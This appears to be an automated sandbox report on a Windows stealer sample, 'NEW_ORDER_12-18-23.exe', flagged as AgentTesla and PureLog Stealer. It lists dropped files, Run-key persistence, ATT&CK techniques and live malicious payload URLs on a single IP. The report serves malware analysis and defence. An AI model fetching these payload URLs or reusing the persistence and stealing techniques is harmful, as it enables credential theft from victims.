                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeQueries volume information: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeQueries volume information: C:\Users\user\AppData\Roaming\spof.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeQueries volume information: C:\Users\user\AppData\Roaming\spof.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 25.2.spof.exe.12b1c7123e8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.spof.exe.12b1c7123e8.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.2225bb97db0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.2225bb97db0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.22249e11790.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.22249e4e2b8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000002.1968348865.0000012B1C701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1750794274.0000024A11F66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.1965677845.0000012B0AADC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1903558795.000002225BB82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1749827601.0000024A0034F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NEW_ORDER_12-18-23.exe PID: 7272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spof.exe PID: 7500, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spof.exe PID: 7948, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NEW_ORDER_12-18-23.exe PID: 7272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spof.exe PID: 7500, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spof.exe PID: 7948, type: MEMORYSTR
                      Source: Yara matchFile source: 25.2.spof.exe.12b1c7123e8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.spof.exe.12b1c7123e8.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.2225bb97db0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.2225bb97db0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.22249e11790.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.22249e4e2b8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000002.1968348865.0000012B1C701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1750794274.0000024A11F66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.1965677845.0000012B0AADC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1903558795.000002225BB82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1749827601.0000024A0034F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NEW_ORDER_12-18-23.exe PID: 7272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spof.exe PID: 7500, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spof.exe PID: 7948, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 25.2.spof.exe.12b1c7123e8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.spof.exe.12b1c7123e8.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.2225bb97db0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.2225bb97db0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.22249e11790.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.spof.exe.22249e4e2b8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000002.1968348865.0000012B1C701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1750794274.0000024A11F66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.1965677845.0000012B0AADC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1903558795.000002225BB82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1749827601.0000024A0034F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NEW_ORDER_12-18-23.exe PID: 7272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spof.exe PID: 7500, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spof.exe PID: 7948, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NEW_ORDER_12-18-23.exe PID: 7272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spof.exe PID: 7500, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spof.exe PID: 7948, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                      Valid AccountsWindows Management Instrumentation1
                      Registry Run Keys / Startup Folder                      		11
                      Process Injection                      		1
                      Masquerading                      		1
                      Input Capture                      		21
                      Security Software Discovery                      		Remote Services1
                      Input Capture                      		Exfiltration Over Other Network Medium1
                      Data Obfuscation                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
                      Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Registry Run Keys / Startup Folder                      		1
                      Disable or Modify Tools                      		LSASS Memory1
                      Process Discovery                      		Remote Desktop Protocol11
                      Archive Collected Data                      		Exfiltration Over Bluetooth1
                      Encrypted Channel                      		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                      Domain AccountsAtLogon Script (Windows)Logon Script (Windows)21
                      Virtualization/Sandbox Evasion                      		Security Account Manager21
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Ingress Tool Transfer                      		Data Encrypted for ImpactDNS ServerEmail Addresses
                      Local AccountsCronLogin HookLogin Hook11
                      Process Injection                      		NTDS12
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureTraffic Duplication1
                      Non-Application Layer Protocol                      		Data DestructionVirtual Private ServerEmployee Names
                      Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA SecretsInternet Connection DiscoverySSHKeyloggingScheduled Transfer1
                      Application Layer Protocol                      		Data Encrypted for ImpactServerGather Victim Network Information
                      Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Obfuscated Files or Information                      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                      External Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Software Packing                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1363933 Sample: NEW_ORDER_12-18-23.exe Startdate: 18/12/2023 Architecture: WINDOWS Score: 100 37 Multi AV Scanner detection for domain / URL 2->37 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 11 other signatures 2->43 6 spof.exe 14 5 2->6         started        9 NEW_ORDER_12-18-23.exe 15 5 2->9         started        13 spof.exe 4 2->13         started        process3 dnsIp4 45 Multi AV Scanner detection for dropped file 6->45 47 Machine Learning detection for dropped file 6->47 15 spof.exe 6->15         started        17 spof.exe 6->17         started        19 spof.exe 6->19         started        27 7 other processes 6->27 35 45.137.22.163, 49729, 49730, 49737 ROOTLAYERNETNL Netherlands 9->35 33 C:\Users\user\AppData\Roaming\spof.exe, PE32+ 9->33 dropped 49 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->49 21 NEW_ORDER_12-18-23.exe 9->21         started        23 NEW_ORDER_12-18-23.exe 9->23         started        25 NEW_ORDER_12-18-23.exe 9->25         started        29 7 other processes 9->29 31 10 other processes 13->31 file5 signatures6 process7

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      NEW_ORDER_12-18-23.exe35%VirustotalBrowse
                      NEW_ORDER_12-18-23.exe27%ReversingLabsWin64.Trojan.Generic
                      NEW_ORDER_12-18-23.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\spof.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\spof.exe27%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Roaming\spof.exe35%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://45.137.22.163/Akoob.pdf100%Avira URL Cloudmalware
                      http://45.137.22.163/Akoob.pdf(Qu100%Avira URL Cloudmalware
                      http://45.137.22.163/Akoob.pdf(Q100%Avira URL Cloudmalware
                      http://45.137.22.163100%Avira URL Cloudmalware
                      http://45.137.22.163/Akoob.pdf12%VirustotalBrowse
                      http://45.137.22.16316%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://45.137.22.163/Akoob.pdffalse
                      • 12%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.ipify.orgNEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11F66000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A0034F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BB82000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C701000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0AADC000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/mgravell/protobuf-netiNEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BA4F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BAC8000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://stackoverflow.com/q/14436606/23354spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://account.dyn.com/NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11F66000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A0034F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BB82000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C701000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0AADC000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/mgravell/protobuf-netJNEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BA4F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BAC8000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C64D000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/11564914/23354;NEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BA4F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BAC8000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/2152978/23354NEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BA4F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BAC8000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/mgravell/protobuf-netNEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BA4F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BAC8000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://45.137.22.163/Akoob.pdf(Qspof.exe, 0000000B.00000002.1901609525.0000022249C21000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A791000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://45.137.22.163NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00001000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249C21000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A791000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 16%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00001000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249C21000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A791000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://45.137.22.163/Akoob.pdf(QuNEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        45.137.22.163
                                        		unknownNetherlands
                                        		51447ROOTLAYERNETNLfalse

                                        General Information

                                        Joe Sandbox version:38.0.0 Ammolite
                                        Analysis ID:1363933
                                        Start date and time:2023-12-18 14:30:08 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 6m 42s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:37
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:NEW_ORDER_12-18-23.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@63/4@0/1
                                        EGA Information:Failed
                                        HCA Information:Failed
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target NEW_ORDER_12-18-23.exe, PID 7272 because it is empty
                                        • Execution Graph export aborted for target spof.exe, PID 7500 because it is empty
                                        • Execution Graph export aborted for target spof.exe, PID 7948 because it is empty
                                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        13:31:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run spof C:\Users\user\AppData\Roaming\spof.exe
                                        13:31:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run spof C:\Users\user\AppData\Roaming\spof.exe
                                        14:31:07API Interceptor1x Sleep call for process: NEW_ORDER_12-18-23.exe modified
                                        14:31:22API Interceptor2x Sleep call for process: spof.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        45.137.22.163SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 45.137.22.163/hiii.pdf
                                        Controllo saldo 30% Ordine 5667.exeGet hashmaliciousAgentTeslaBrowse
                                        • 45.137.22.163/bless_Jkvszuhw.png
                                        Quotation-pdf______________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                        • 45.137.22.163/Toscgshw_Yvmodcuo.png
                                        #Uc8fc#Ubb38 30% #Uc794#Uc561 #Ud655#Uc778.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 45.137.22.163/orderfile_Hecqxfqw.png
                                        New order _xls.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 45.137.22.163/New_order__xls_Ivuuoipf.bmp
                                        SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 45.137.22.163/fact_Sptqaevl.bmp
                                        order confirmation 46574 -QT-04-0022.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 45.137.22.163/order_confirmation_46574_-QT-04-0022_Yszciyqc.jpg
                                        Quotation-pdf______________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                        • 45.137.22.163/Kwcmalox_Bcqlnfnp.jpg
                                        2467864 _INV_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 45.137.22.163/Hebvr_Lwvvdxxi.bmp
                                        conferma d'ordine 46574.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 45.137.22.163/fresh_Djctepjr.png
                                        factura proforma PI- PI04522 7486.exeGet hashmaliciousUnknownBrowse
                                        • 45.137.22.163/trans_Yygygcyg.jpg
                                        PI- PI04522 74868.exeGet hashmaliciousAgentTeslaBrowse
                                        • 45.137.22.163/proforma_invoice_Crnbdlom.png
